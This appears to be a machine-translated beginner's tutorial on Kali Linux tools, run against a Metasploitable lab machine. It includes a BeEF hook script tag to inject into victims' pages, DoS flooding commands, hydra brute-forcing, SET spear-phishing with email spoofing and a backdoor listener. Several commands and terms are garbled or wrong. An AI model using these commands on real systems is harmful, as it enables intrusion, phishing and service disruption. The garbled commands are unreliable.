.jpg)
Kali Linux is one of the best open-source security packages for the ethical hacker, containing a set of tools divided into categories. Kali Linux can be installed on the machine as the operating system discussed in this guide. Installing Kali Linux is a practical option as it gives you more options to work with and combine tools.
This guide gives a complete understanding of Kali Linux and explains how to use it in practice.
This guide has been prepared for beginners to help them understand the basics of Kali Linux. This will be especially useful for penetration testing professionals. After completing this guide, you will find that you have a moderate level of knowledge and will be able to move to the next level.
While this guide will be helpful to most beginners, it will definitely be a plus if you are familiar with the basic concepts of any Linux operating system.
I will cover this topic
Kali Linux - Installation and setup
Kali Linux - Information Gathering Tools
Kali Linux - Vulnerability Analysis Tools
Kali Linux - Wireless attacks
Kali Linux - Website Penetration Testing
Kali Linux - Exploitation Tools
Kali Linux - Forensic Tools
Kali Linux - Social Engineering
Kali Linux - Stress Tools
Kali Linux - sniffing and spoofing
Kali Linux - Password Cracking Tools
Kali Linux - Maintaining Access
Kali Linux - reverse engineering
Kali Linux - Reporting Tools
In this chapter, we will learn about Kali Linux - Installation and setup .
Kali Linux is one of the best security packages for the ethical hacker, containing a set of tools divided into categories. It is open-source and its official web page is https://www.kali.org.
Typically, Kali Linux can be installed on a machine as an operating system, as a virtual machine, which we will discuss in the next section. Installing Kali Linux is a practical option as it gives you more options to work with and combine tools. You can also create a live boot CD or USB. All this can be found at the following link: https://www.kali.org/downloads/
BackTrack was an old version of the Kali Linux distribution. The latest release is Kali 2022 and is updated very frequently.
To install Kali Linux -
First, we will download Virtual Box and install it.
Later, we will download and install the Kali Linux distribution.
Download and install Virtual Box
Virtual Box is especially useful when you want to test something on Kali Linux that you are not sure about. Running Kali Linux on Virtual Box is safe if you want to experiment with unknown packages or test code.
With Virtual Box, you can install Kali Linux on your system (not directly on your hard drive) along with your main OS, which can be MAC, Windows, or another flavor of Linux.
Let's see how you can download and install Virtual Box on your system.
Step 1 - Go to https://www.virtualbox.org/wiki/Downloads to download. Select the correct package depending on your operating system. In this case, it will be the first for Windows as shown in the following screenshot.
Step 2 - Click Next .
Step 3 - On the next page, you will be able to select the location where you want to install the application. In this case, leave this value as default and click Next .
Step 4 - Click Next and the following Custom Setup screenshot appears. Select the components you want to install and click on Next.
Step 5 - Click Yes to proceed with the installation.
Step 6 - Click the Finish button.
The Virtual Box application will open as shown in the following screenshot. We are now ready to install the rest of the hosts for this tutorial and this is also recommended for professional use.
Install Kali Linux
Now that we have successfully installed Virtual Box, let's move on to the next step and install Kali Linux.
Step 1 - Download the Kali Linux package from the official website: https://www.kali.org/downloads/
Step 2 - Click VirtualBox
Step 3 - Select the correct virtual hard disk file and click Open .
Step 4 - Launch Kali OS. The default username is root and the password is toor .
Update Kali
It is important to keep Kali Linux and its tools updated to new versions to keep them functional. Following are the steps to upgrade Kali.
Step 1 - Go to Application → Terminal. Then type "apt-get update" and the update will happen as shown in the following screenshot.
Step 2 - Now to update the tools, type "apt-get upgrade" and the new packages will be downloaded.
Step 3 - It will ask if you want to continue. Type "Y" and "Enter".
Step 4 - To upgrade to a newer version of the operating system, type “apt-get distupgrade” .
Lab setup
In this section, we will set up another test machine to run tests with the Kali Linux tools.
Step 1 - Download Metasploitable which is a Linux machine. It can be downloaded from the Rapid7 official website : https://information.rapid7.com/metasploitabledownload.html?LS=1631875&CS=web
Step 2 - Sign up with your details. By filling out the form above, we can download the software.
Step 3 - Click VirtualBox → New .
Step 4 - Click “Use an existing virtual hard disk file” . Browse the file where you downloaded Metasploitable and click Open .
Step 5 - A screen for creating a virtual machine will appear. Click Create.
Default username: msfadmin and password msfadmin .
In this chapter, we will discuss Kali Linux information-gathering tools.
NMAP and ZenMAP
NMAP and ZenMAP are useful tools in the scanning phase of ethical hacking in Kali Linux. NMAP and ZenMAP are basically the same tools, however, NMAP uses the command line while ZenMAP has a graphical interface.
NMAP is a free network detection and security monitoring tool. Many systems and network administrators also find it useful in tasks such as network assets, managing service development schedules, and monitoring host or service uptime.
NMAP uses raw IP packets in a new way to determine which hosts are available on the network, what services (application name and version) these hosts offer, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are being used, and etc.
Now let's go step by step
Step 1 - go to Applications → 01-Information Gathering → nmap or zenmap.
Step 2 - The next step is to determine the OS type/version of the target host. Based on the help specified in the NMAP protocol, the OS type/version detection parameter is the "-O" variable. For more information use this link: https://nmap.org/book/man-os-detection.html
The command we will be using is :-
nmap -O 192.168.1.101The following screenshot shows where you need to enter the above command to see the output of Nmap.
Step 3 - Then open the TCP and UDP ports. To scan all NMAP based TCP ports, use the following command -
nmap -p 1-65535 -T4 192.168.1.101
Where the "-p" option specifies all TCP ports to be scanned. In this case, we are scanning all ports, and "-T4" is the scan rate that NMAP should run at.
Below are the results. Green shows all open TCP ports and red shows all closed ports. However, NMAP is not displayed because the list is too long.
covert scanning
A covert scan or SYN is also known as a half-open scan because it does not complete the TCP three-way handshake. The hacker sends the target SYN packet; if a SYN/ACK frame is received back, the target is expected to terminate the connection and the port is listening. If a RST is received from the target, the port is assumed to be inactive or closed.
Now, to see SYN scanning in action, use the -sS option in NMAP. Following is the complete command -
nmap -sS -T4 192.168.1.101The following screenshot shows how to use this command -
/Searchsploit
Searchsploit is a tool that helps Kali Linux users to perform direct searches using the command line from the Exploit database archive.
To open it, go to Applications → 08-Operational Tools → searchsploit as shown in the following screenshot.
After opening a terminal, enter " searchsploit exploit index name ".
DNS tools
In this section, we will learn how to use some of the DNS tools built into Kali. Essentially, these tools help in zone transfer or domain IP issues.
dnsenum.pl
The first tool is dnsenum.pl which is a PERL script that helps to connect MX, A and other records to a domain.
Click Terminal in the left pane.
Type “dnsenum domain name” and all entries will be shown. In this case, A records are displayed.
DNSMAP
The second tool is DNSMAP which helps to find phone numbers, contacts and other subdomains associated with this domain we are looking for. Below is an example.
Click the terminal like in the top section, then write “dnsmap domain name”
dnstracer
The third tool is dnstracer , which determines where a given Domain Name Server (DNS) gets information for a given hostname.
Click terminal like in the top section, then type “dnstracer domain name”.
LBD Tools
The LBD (Load Balancing Detector) tools are very interesting as they detect if a given domain is using DNS and/or HTTP load balancing. This is important because if you have two servers, one or the other may not be updated and you can try to use it. Following are the steps to use it -
First, click Terminal on the left pane.
Then enter "lbd domainname" . If it returns "FOUND", it means that the server has load balancing. In this case, the result will be "NOT FOUND".
Hping3
Hping3 is widely used by ethical hackers. It is almost similar to the ping tools but is more advanced as it can bypass the firewall filter and use TCP, UDP, ICMP and RAW-IP protocols. It has a trace mode and the ability to send files between a closed channel.
Click Terminal in the left pane.
Type "hping3 -h" which will show you how to use this command.
Another command “hping3 domain or IP -parameter”
In this chapter, we will learn how to use some of the tools that help us use devices or applications to gain access.
Cisco Tools
Kali has some tools that can be used to operate a Cisco router. One such tool is Cisco-torch which is used for bulk scanning, fingerprinting and exploitation.
Let's open the terminal console by clicking on the left pane.
Then enter "cisco-torch --parameter IP of host" and if nothing is found to use, the following result will be shown.
To see which options you can use, type “cisco-torch ?”
Cisco Audit Tool
This is a PERL script that scans Cisco routers for common vulnerabilities. To use it, open the terminal again in the left pane as shown in the previous section and type “CAT –h hostname or IP” .
You can add the port parameter “-p” as shown in the following screenshot, which in this case is 23 to iterate over it.
Cisco Global Exploiter (CGE) is an advanced, simple and fast security assessment tool. With these tools, you can do several types of attacks as shown in the following screenshot.. However, be careful when testing in a real environment, as some of them may cause the Cisco device to fail. For example, the option might stop services.
To use this tool, enter "cge.pl IPaddress number of vulnerabilities"
The following screenshot shows the result of a test performed on a Cisco router for vulnerability number 3 from the list above. The result shows that the vulnerability was successfully exploited.
BED
BED is a program designed to check daemons for possible buffer overflows, format strings, etc. al.
In this case, we will test the test machine with IP. 192.168.1.102 and HTTP protocol.
The command will be "bed -s HTTP -t 192.168.1.102" and testing will continue.
In this chapter, we will learn how to use the Wi-Fi hacking tools built into Kali Linux. However, it is important that the wireless card you are using supports monitor mode.
Fern Wifi Cracker
Fern Wifi Hack is one of Kali's tools for hacking wireless networks.
Before opening Fern, we must put the wireless card into monitoring mode. and type the command in the terminal “airmon-ng start wlan-0”
Now open Fern Wireless Cracker.
Step 1 - Click "Applications"→ Click "Wireless Attacks" → "Fern Wireless Cracker".
Step 2 - Select your wireless card as shown in the following screenshot.
Step 3 - Click on the "Search for Access Points".
Step 4 - After the scan is completed, all found wireless networks will be displayed. In this case, only detected "WPA networks"
Step 5 - Click WPA networks as shown in the screenshot above. Shows all found wireless networks. Typically, on WPA networks, it performs dictionary attacks as such.
Step 6 - Click on "Browse" and find the attack word list.
Step 7 - Click "Wi-Fi Attack".
Step 8 - After completing the dictionary attack, it has found the password and it will be displayed as shown in the following screenshot.
Kismet
Kismet is a Wi-Fi network analysis tool. It is an 802.11 layer 2 wireless network detection, sniffer and intrusion detection system. It will work with any wireless card that supports direct monitoring mode (rfmon) and can sniff 802.11a/b/g/n traffic. It identifies networks by collecting packets as well as hidden networks.
To use it, put your wireless card into monitor mode and to do so, type “airmon-ng start wlan-0” in a terminal.
Let's learn how to use this tool.
Step 1 - To run it, open a terminal and type "kismet".
Step 2 - Click OK.
Step 3 - Click "Yes" when prompted to start Kismet Server. Otherwise, it will stop working.
Step 4 - Leave the launch options as default. Click Start.
Step 5 - A table will now appear asking you to identify your wireless card. In this case, click Yes.
Step 6 - In this case, the wireless source is “wlan0” . This will need to be written in the “Intf” section → click “Add”.
Step 7 - It will start sniffing Wi-Fi networks as shown in the following screenshot.
Step 8 - Click any network, the wireless network information will appear as shown in the following screenshot.
GISKismet
GISKismet is a wireless visualization tool for hands-on presentation of data collected with Kismet. GISKismet stores information in a database so we can query the data and create plots using SQL. GISKismet currently uses SQLite for the database and GoogleEarth/KML files for plotting.
Let's learn how to use this tool.
Step 1 - To open GISKismet go to: Applications → Click Wireless Attacks → giskismet.
As you remember in the previous section, we used the Kismet tool to explore wireless data and all of that data that Kismet packs into not XML files.
Step 2 - To import this file into Giskismet type "root@kali:~#giskismet -x Kismetfilename.not XML" and it will start importing the files.
Once imported, we can import them into the Google Earth hotspots we found earlier.
Step 3 - Assuming we have already installed Google Earth, we click on File → Open file created by Giskismet → Click on Open.
The next map will be displayed.
ghost fisher
Ghost Phisher is a popular tool that helps create fake wireless access points and then create Man-in-The-Middle-Attack attacks.
Step 1 - To open it, click Applications → Wireless Attacks → Ghost Phishing.
Step 2 - After opening it, we will set up a fake hotspot using the following details.
Wireless input: wlan0
SSID: wireless access point name
IP Address: The IP address of the access point.
WAP: password that this SSID will have to connect
Step 3 - Click the Start button.
WiFi
This is another wireless click tool that attacks multiple WEP, WPA and WPS encrypted networks in a row.
First, the wireless card must be in monitoring mode.
Step 1 - To open it, go to Applications → Wireless Attack → Wifite.
Step 2 - Type "wifite –showb" to scan networks.
Step 3 - To start attacking wireless networks, press Ctrl + C.
Step 4 - Enter "1" to hack the first wireless network.
Step 5 - After the attack is completed, the key will be found.
In this chapter, we will learn about website penetration testing offered by Kali Linux.
Using Vega
Vega is a free and open source scanner and testing platform for checking the security of web applications. Vega can help you find and test SQL injection, cross-site scripting (XSS), inadvertently exposed sensitive information, and other vulnerabilities. It is written in Java, GUI based and runs on Linux, OS X and Windows.
Vega includes an automatic scanner for quick tests and an intercepting proxy for tactical verification. Vega can be extended with a powerful API in the language of the web: JavaScript. Official web page https://subgraph.com/vega/
Step 1 - To open Vega, go to Applications → 03-Web Application Analysis → Vega.
Step 2 - If you don't see the app in the path, enter the following command.
Step 3 - Click the "+" icon to start scanning.
Step 4 - Enter the URL of the web page to be crawled. In this case, it is a meta-production machine → click next.
Step 5 - Check all the boxes of the modules you want to manage. Then click Next.
Step 6 - Click "Next" again in the following screenshot.
Step 7 - Click Finish.
Step 8 - If the following table appears, click Yes.
The scan will shown in the following screenshot.
Step 9 - After the scan is completed, on the bottom left panel, you can see all the results, which are classified according to severity. If you click on it, you will see all the details of the vulnerabilities in the right panel, such as Request, Discussion, Impact, and Remediation.
ZapProxy
ZAP-OWASP Zed Attack Proxy (zap) is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. This is a Java interface.
Step 1 - To open ZapProxy, go to Applications → 03-Web Application Analysis → owasp-zap.
Step 2 - Click "Accept".
ZAP will start downloading.
Step 3 - Select one of the options as shown in the following screenshot and click Start.
The following network is meta-used with IP: 192.168.1.101
Step 4 - Enter the testnet URL in "Attack URL" → click "Attack".
After the scan is completed, you will see all the scanned sites in the upper left panel.
In the left "Warnings" panel, you will see all the results along with a description.
Step 5 - Click "Spider" and you will see all the crawled links.
Using database tools
sqlmap
sqlmap is an open source penetration testing tool that automates the process of discovering and exploiting the flaws of SQL injection and taking over database servers. It comes with a powerful discovery engine, a lot of niche features for the ultimate penetration tester, and a wide range of switches ranging from database fingerprinting and getting data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. .
Let's learn how to use sqlmap.
Step 1 - To open sqlmap go to Applications → 04-Database Evaluation → sqlmap.
A web page that has parameters that are vulnerable to SQL injection is metaplain.
Step 2 - To start SQL injection testing, enter “sqlmap – u URL of victim”
Step 3 - You will see from the results that some variables are vulnerable.
sqlninja
sqlninja is a SQL injection on Microsoft SQL Server for full GUI access. sqlninja is a tool designed to exploit SQL Injection vulnerabilities in a web application using Microsoft SQL Server as a back end. Full details of this tool can be found at http://sqlninja.sourceforge.net/
Step 1 - To open sqlninja, go to Applications → 04-Database Evaluation → sqlninja.
CMS scanning tools
WPScan
WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations for security issues.
Step 1 - To open WPscan, go to Applications → 03-Web Application Analysis → "wpscan".
The following screenshot will appear.
Step 2 - To scan the site for vulnerabilities, type “wpscan –u URL of webpage” .
If the scanner is not updating, it will ask you to update. I recommend doing this.
Once the scan starts, you will see the results. In the following screenshot, the vulnerabilities are indicated by a red arrow.
Joomscan
Joomla is probably the most widely used CMS due to its flexibility. For this CMS, this is the Joomla scanner. This will help web developers and webmasters identify potential security weaknesses in their Joomla deployments.
Step 1 - To open it, just click on the left panel on the terminal, then “joomscan – parameter” .
Step 2 - To get help on how to use "joomscan /?"
Step 3 - To start scanning, type "joomscan -u victim URL".
The results will be displayed as shown in the following screenshot.
SSL scanning tools
TLSSLed is a Linux shell script used to assess the security of a target SSL/TLS (HTTPS) web server implementation. It is based on sslscan, a full blown SSL/TLS scanner based on the openssl library, and on the "openssl s_client" command line tool.
Current tests include whether the target supports the SSLv2 protocol, null cipher, weak ciphers based on their key length (40 or 56 bits), strong ciphers (such as AES), MD5 digital certificate signing, and current renegotiation capabilities SSL/TLS.
To start testing, open a terminal and type "tlssled URL port" . It will start testing the certificate for data lookup.
You can see from the output that the certificate is valid until 2018, as shown in green in the following screenshot.
w3af
w3af is a web application attack and audit framework that aims to identify and exploit all web application vulnerabilities. This package provides a graphical user interface (GUI) for the platform. If you only need a command line application, install w3af-console.
The framework has been dubbed "metasploit for the web", but it's actually much more than that, as it also detects web application vulnerabilities through black box scanning techniques. The w3af core and its plugins are written entirely in Python. The project has over 130 plugins that define and use SQL injection, cross-site scripting (XSS), remote file inclusion, and more.
Step 1 - To open it go to Applications → 03-Web Application Analysis → Click w3af.
Step 2 - In the "Target" field, enter the victim's URL, which in this case will be the meta-used web address.
Step 3 - Select a profile → Click Start.
Step 4 - Go to "Results" and you will see the result with details.
In this chapter, we will learn about the various exploitation tools offered by Kali Linux.
Metasploit
As we mentioned earlier, Metasploit is a product of Rapid7 and most of the resources can be found on their webpage www.metasploit.com . It is available in two versions - commercial and free. The differences between these two versions are small, so in this case we will use the community (free) version.
As an ethical hacker, you will use the Kali Distribution, which has a built-in version of the Metasploit community, as well as other ethical hacking tools, which are very convenient due to the installation time savings. However, if you want to install as a standalone tool, this is an application that can be installed on operating systems such as Linux, Windows, and OS X.
First, open the Metasploit console in Kali. Then go to Applications → Exploitation Tools → Metasploit.
After running it, you will see the following screen with the Metasploit version underlined in red.
In the console, if you use help or? symbol, it will show you a list with MSP commands along with their description. You can choose based on your needs and what you will be using.
Another important administrative command is msfupdate which helps update metasploit with the latest vulnerability exploits. After running this command in the console, you will have to wait a few minutes for the update to complete.
It has a nice command called "Search" that you can use to find what you need as shown in the following screenshot. For example, I want to search for Microsoft related exploits and the command might be msf >search name:Microsoft type:exploit .
Where "search" is the command, "name" is the name of the object we are looking for, and "type" is the script type we are looking for.
Another command is "information". It provides information about the module or platform where it is used, who the author is, information about the vulnerability, and the payload limit it can have.
Armitage
The Armitage GUI for metasploit is a complementary tool for metasploit. It visualizes targets, recommends exploits, and provides enhanced post-exploitation options.
Let's open it, but first we need to open and run the metasploit console. To open Armitage, go to Applications → Exploit Tools → Armitage.
Click the Connect icon button as shown in the following screenshot.
When it opens, you will see the following screen.
Armitage is easy to use. The "Targets" area lists all the machines you have discovered and are working with, hacked targets are colored red with a thunderstorm.
Once you've hacked a target, you can right-click on it and continue exploring what you need to do, such as explore (browse) folders.
In the following GUI, you will see a folder view called the console. By simply clicking folders, you can navigate through folders without using metasploit commands.
On the right side of the GUI is a section that lists vulnerability modules.
BeEF
BeEF stands for Browser Exploitation Framework . It is a penetration testing tool that is focused on the web browser. BeEF allows a professional penetration tester to assess the actual security state of a target environment using client-side attack vectors.
First, you need to update the Kali package using the following commands:
root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss
To get started use the following command -
root@kali:/# cd /usr/share/beef-xss
root@kali:/# ./beef
Open a browser and enter your username and password: beef .
A BeEF hook is a JavaScript file hosted by a BeEF server that must run on client browsers. When this happens, it contacts the BeEF server, passing a lot of information about the target. It also allows additional commands and modules to be run against the target. In this example, the location of the BeEF hook is at http://192.168.1.101:3000/hook.js .
To attack the browser, enable a JavaScript interceptor on the page that the client will be viewing. There are several ways to do this, but the simplest is to paste the following into the page and somehow get the client to open it.
<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script>
Once the page has loaded, return to the BeEF dashboard and click on "Online Browsers" in the top left corner. After a few seconds, you should see a pop-up with your IP address representing the connected browser. By hovering over an IP address, you can quickly get information such as browser version, operating system, and installed plugins.
To run the command remotely, click Own Host. Then, in the command, click the module you want to execute and finally click Run.
Linux Exploit Advisor
Suggests possible exploits given the release version 'uname -r' of the Linux operating system.
To run it, enter the following command -
root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0
3.0.0 is the Linux kernel version we want to use.
In this chapter, we will learn about the forensic tools available in Kali Linux.
p0f
p0f is a tool that can identify the operating system of the target host by simply examining captured packets, even if the device in question is behind a packet firewall. P0f does not create any additional network traffic, direct or indirect; no name lookup; no mysterious probes; no ARIN requests; nothing. In the hands of advanced users, P0f can detect the presence of a firewall, NAT usage, and the presence of load balancers.
Type "p0f -h" in terminal to see how to use it and you will get the following results.
It will even list the available interfaces.
Then enter the following command: “p0f –i eth0 –p -o filename” .
Where the "-i" option is the name of the interface, as shown above. "-p" means it is in promiscuous mode. "-o" means that the result will be saved to a file.
Open a web page with the address 192.168.1.2
You can see from the results that the web server is using apache 2.x and the OS is Debian.
pdf parser
pdf-parser is a tool that parses a PDF document to determine the main elements used in the parsed PDF. It will not display the PDF document. It's not recommended for use in PDF parser tutorials, but it does the job. This is typically used for PDF files that you suspect have a script embedded in them.
Command -
pdf-parser -o 10 filepath
where "-o" is the number of objects.
As you can see in the following screenshot, the pdf file opens a CMD command.
Dumpzilla
The Dumpzilla application is developed in Python 3.x and is designed to extract all forensic interesting information from Firefox, Iceweasel and Seamonkey browsers for analysis.
ddrescue
It copies data from one file or block device (hard drive, CD, etc.) to another, trying to salvage the good parts first in case of read errors.
The basic operation of ddrescue is completely automatic. That is, you don't have to wait for an error, stop the program, restart it from a new position, etc.
If you use the mapfile function in ddrescue, the data is saved very efficiently (only the necessary blocks are read). In addition, you can interrupt the rescue operation at any time and resume it later at the same time. The map file is an important part of the efficiency of ddrescue. Use it if you don't know what you are doing.
Command line -
dd_rescue infilepath outfilepath
The "–v" option means verbose. "/dev/sdb" is the folder to save. In the img file , this is the restored image.
DFF
This is another forensic tool used to recover files. It also has a graphical interface. To open it, type “dff-gui” in the terminal and the following web interface will open.
Click File → Open Evidence.
The following table will open. Check "Raw format" and click "+" to select the folder you want to recover.
You can then view the files on the left side of the panel to see what has been recovered.
In this chapter, we will learn about social engineering tools used in Kali Linux.
Using social engineering tools
The Social-Engineer Toolkit (SET) is an open source penetration testing framework designed for social engineering. SET has several configurable attack vectors that allow you to mount a plausible attack in a short amount of time. Tools like this use human behavior to trick them into attack vectors.
Let's learn how to use the social engineer toolkit.
Step 1 - To open SET, go to Applications → Social Engineering Tools → Click "SET" Social Engineering Tool.
Step 2 - It will ask if you agree to the terms of use. Type “y” as shown in the following screenshot.
Step 3 - Most of the menus shown in the following screenshot are self-explanatory, and among them, number 1 "Social Engineering Attacks" is the most important.
Step 4 - Type “1” → Enter. A submenu will open. If you press Enter Press the button again, you will see explanations for each submenu.
The Spear-phishing module allows you to specifically craft email messages and send them to targeted victims with FileFormatmalicious payloads attached. For example, sending a malicious PDF document that, if opened by the victim, will compromise the system. If you want to spoof your email address, make sure "Sendmail" is installed (apt-get install sendmail) and change the config/set_config flag SENDMAIL=OFF to SENDMAIL=ON.
There are two types of spear phishing attacks:
Perform Bulk Email Attack
Creating a FileFormat Payload and Social Engineering Pattern
The former allows SET to do everything for you (option 1), the latter allows you to create your own FileFormat payload and use it in your attack.
Type “99” to return to the main menu and then type “2” to go to “Web Attack Vectors”.
The web attack module is a unique way to use multiple web attacks to compromise the intended victim. This module is used to perform phishing attacks against the victim if they follow the link. When following a link, many attacks can occur.
Type “99” to return to the main menu, then enter “3” .
The USB/CD/DVD infectious module will create an autorun.inf file and a Metasploit payload. The payload and autorun file is written or copied to USB. When a DVD/USB/CD is inserted into the victim's machine, it triggers the autorun feature (if autorun is enabled) and hopefully compromises the system. You can choose the attack vector you want to use: file format errors or a simple executable.
Below are the parameters of the infectious carrier generator.
File Format Exploits
Standard Metasploit Executable
Type “99” to return to the main menu. Then type “4” to go to “Web Attack Vectors”.
Creating a payload and listener is an easy way to create a Metasploit payload. It will export the exe file and generate the listener. You will need to convince the victim to download the exe file and run it to get the shell.
Type “99” to return to the main menu and then type “5” to go to “Web Attack Vectors”.
A mass mailing attack will allow you to send multiple emails to victims and customize the messages. There are two options in bulk email; the first is to send an email to a single email address. The second option allows you to import a list that has all the recipients' emails and it will send your message to any number of people on that list.
Single email address for email attack
Bulk email attacks
Type “99” to return to the main menu and then type “9” to go to “Powershell Attack Vector”.
The Powershell Attack Vector module allows you to create attacks specific to PowerShell. These attacks allow the use of PowerShell, which is available by default on all Windows Vista and higher operating systems. PowerShell provides a favorable environment for deploying payloads and performing functions that are not triggered by proactive technologies.
Powershell alphanumeric shellcode injector
Powershell Reverse Shell
Powershell binding shell
Powershell Dump SAM database
Stress tools are used to create DoS attacks or to create stress tests for various applications in order to take appropriate action in the future.
All stress testing tools are located in Applications → 02-Vulnerability Analysis → Stress Testing.
All stress tests will be run on a metsploitable machine with IP address 192.168.1.102.
Slowhttptest
Slowhttptest is one of the DoS attack tools. It specifically uses the HTTP protocol to connect to the server and to keep resources such as CPU and RAM busy. Let's see in detail how to use it and explain its functions.
To open slowhttptest, first open a terminal and type “slowhttptest –parameters” .
You can type "slowhttptest -h" to see all the options you need to use. If you get "Command not found" output, you need to type "apt-get install slowhttptest" first .
Then after installation again type slowhttptest -h
Enter the following command -
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u
http://192.168.1.202/index.php -x 24 -p 2
Where,
(-c 500) = 500 connections
(-H) = Slowloris Mode
-g = Generate statistics
-o outputfile = Output file name
-i 10 = Use 10 seconds to wait for data
-r 200 = 200 connections with -t GET = GET requests
-u http://192.168.1.202/index.php = target URL
-x 24 = maximum length 24 bytes
-p 2 = 2 second timeout
After running the test, the output will be as shown in the following screenshot where you can notice that the service is available.
After some time on connection 287, the service is disabled. This means that the server can handle a maximum of 287 HTTP connections.
inviteflood
Inviteflood is a SIP/SDP INVITE message sent over UDP/IP. It works on various Linux distributions. It performs DoS (denial of service) attacks against SIP devices by sending multiple INVITE requests.
To open Inviteflood, first open a terminal and type “inviteflood –parameters”
For reference, you can use "inviteflood -h"
Next, you can use the following command -
inviteflood eth0 target_extension target_domain target_ip number_of_packets
Where,
target_extension 2000
target_domain is 192.168.xx
target_ip is 192.168.xx
number_of_packets 1
-a is the SIP account alias
Iaxflood
Iaxflood is a DoS tool for VoIP. To open it, type "iaxflood sourcename destinationname numpackets" in a terminal.
To learn how to use, type "iaxflood -h"
thc-ssl-dos
THC-SSL-DOS is a SSL performance test tool. Establishing a secure SSL connection requires 15 times more processing power on the server than on the client. THCSSL-DOS takes advantage of this asymmetry by overloading the server and disconnecting it from the Internet.
Following is the command -
thc-ssl-dos victimIP httpsport –accept
In this example it would be -
thc-ssl-dos 192.168.1.1 443 –accept
Its output will be as follows:
The basic concept of sniffing tools is as simple as wiretapping, and Kali Linux has several popular tools for this purpose. In this chapter, we will learn about the sniffing and spoofing tools available in Kali.
Burpsuite
Burpsuite can be used as an eavesdropping tool between your browser and web servers to find the settings a web application is using.
To open Burpsuite, go to Applications → Web Application Analysis → Burpsuite.
To set up sniffing, we configure burpsuite to act as a proxy. To do this, go to Options as shown in the following screenshot. Check the box as shown.
In this case, the proxy IP address will be 127.0.0.1 with port 8080.
Then set up a browser proxy, which is the burpsuite machine's IP address and port.
To start interception, go to Proxy → Interception → click "Intercept enabled".
Continue navigating the web page where you want to find the vulnerability check setting.
In this case, this is a meta-production machine with IP 192.168.1.102.
Go to HTTP History. In the following screenshot, the line marked with a red arrow shows the last request. In Raw, a hidden setting such as session ID and other options such as username and password are underlined in red.
mitmpproxy
mitmproxy is a man-in-the-middle HTTP proxy with SSL support. It provides a console interface that allows you to monitor and edit traffic flows on the fly.
To open it go to the terminal and type “mitmproxy -parameter” and for command help type “mitmproxy –h” .
To start mitmproxy, type “mitmproxy –p portnumber” . In this case it is "mitmproxy -p 80".
Wireshark
Wireshark is one of the best packet sniffer. It deeply analyzes packets at the frame level. You can get more information about Wireshark on their official webpage: https://www.wireshark.org/ . In Kali, it can be found in the following path - Applications → Sniffing & Spoofing → wireshark.
Once you click wireshark, the following GUI will open.
Click Start and packet capture will start as shown in the following screenshot.
sslstrip
sslstrip is a MITM attack that causes the victim's browser to exchange data in plain text over HTTP and the proxy servers modify the content from the HTTPS server. To do this, sslstrip "removes" https:// URLs and turns them into http:// URLs.
To open it go to Applications → 09-Sniffing & Spoofing → Spoofing and MITM → sslstrip.
To set it up, write to redirect all 80 port communications to 8080.
Then run the sslstrip command on the required port.
In this chapter, we will learn about important password cracking tools used in Kali Linux.
Hydra
Hydra is a login cracker that supports many attack protocols (Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET , HTTP(S)-HEAD, HTTP Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1 + v2 + v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP ) .
To open it, go to Applications → Password Attacks → Online Attacks → Hydra.
The terminal console will open as shown in the following screenshot.
In this case, we will iterate over the FTP service of the meta machine with IP 192.168.1.101.
We have created a list of words in Kali with the extension lst in the path usr\share\wordlist\metasploit .
The command will be next -
hydra -l /usr/share/wordlists/metasploit/user -P
/usr/share/wordlists/metasploit/ passwords ftp://192.168.1.101 –V
where -V is the username and password when trying
As shown in the following screenshot, the username and password found are msfadmin: msfadmin
Johnny
Johnny is a GUI for the John the Ripper password cracking tool. It is usually used for weak passwords.
To open it, go to Applications → Password Attacks → Johnny.
In this case, we will get the password of the Kali machine with the following command and the file will be created on the desktop.
Click Open Password File → OK and all files will be shown as in the following screenshot.
Click "Start Attack".
Once the attack is complete, click the left pane under "Passwords" and the password will not be shaded.
John
john is the command line version of Johnny GUI. To run it, open Terminal and type "john" .
In case of password cancellation, we need to write the following command -
root@kali:~# unshadow passwd shadow > unshadowed.txt
rainbow crack
RainbowCrack cracks hashes using a rainbow table lookup. Rainbow tables are regular files stored on a hard drive. Typically, Rainbow tables are purchased online or can be compiled using a variety of tools.
To open it, go to Applications → Password Attacks → click on "rainbowcrack".
Command to crack password hash -
rcrack path_to_rainbow_tables -f path_to_password_hash
SQLdict
It is a dictionary attack tool for SQL server which is very simple and easy to use. To open it, open a terminal and type "sqldict" . The following view will open.
In the Destination IP Server section, enter the IP address of the server hosting SQL. In the Target Account section, enter your username. Then upload the password file and click start until it finishes.
hash identifier
It is a tool that is used to determine the types of hashes, i.e. what they are used for. For example, if I have a HASH, it can tell me if it's a Linux or Windows HASH.
The screen above shows that it could be an MD5 hash and it appears to be credentials cached by the domain.
In this chapter, we will see the tools that Kali uses to maintain a connection and to access a compromised machine even when it reconnects and disconnects.
Powersploit
This is a tool designed for Windows computers. PowerShell is installed on the victim's computer. This tool helps the hacker to connect to the victim's machine via PowerShell.
To open it, open a terminal on the left and type the following command to enter the powersploit folder -
cd /usr/share/powersploit/
If you type "ls" it will list all the powersploit tools that you can download and install on the victim's machine after gaining access. Most of them are self-explanatory according to their names.
An easy way to download this tool on the victim's machine is to create a web server, which powersploit tools make it easy to create with the following command:
python -m SimpleHTTPServer
After that, if you type: http:// <ip_address of the Kali machine>: 8000 / the following result.
Sbd
sbd is a tool similar to Netcat. It is portable and can be used on Linux and Microsoft machines. sbd has AES-CBC-128 + HMAC-SHA1 encryption > Essentially, it helps to connect to the victim's machine at any time through a specific port and send commands remotely.
To open it, go to the terminal and type "sbd -l -p port" to make the server accept connections.
In this case, let's put port 44 on which the server will listen.
